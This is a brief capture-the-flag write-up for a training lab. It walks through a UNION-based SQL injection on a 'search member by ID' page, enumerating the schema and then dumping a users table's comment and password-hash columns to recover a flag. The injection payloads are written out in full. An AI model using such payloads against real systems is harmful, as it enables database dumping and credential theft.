Make this SQL Injection to find table structure : 
1 AND 1=2 UNION SELECT table_name, column_name FROM information_schema.columns

We are interested by this table :
----------------------------------------------------------------------------------------------------------
|                                                  users                                                 |
----------------------------------------------------------------------------------------------------------
|  user_id  |  first_name  |  last_name  |  town  |  country  |  planet  |  Commentaire  |  countersign  |
---------------------------------------------------------------------------------^---------------^--------

Make this SQL Injection in the "SEARCH MEMBER BY ID:" field :
1 AND 1=2 UNION SELECT Commentaire, countersign FROM users

As you can see, the user number 5 is the flag (you can add "WHERE user_id = 5" to the latest SQL injection 
if you want to have just the right user).

Get the surname (which is the password), follow the instruction (md5 decode, lowercase, then sha256 encode the result (FortyTwo))

URL: http://<ip>/?page=member
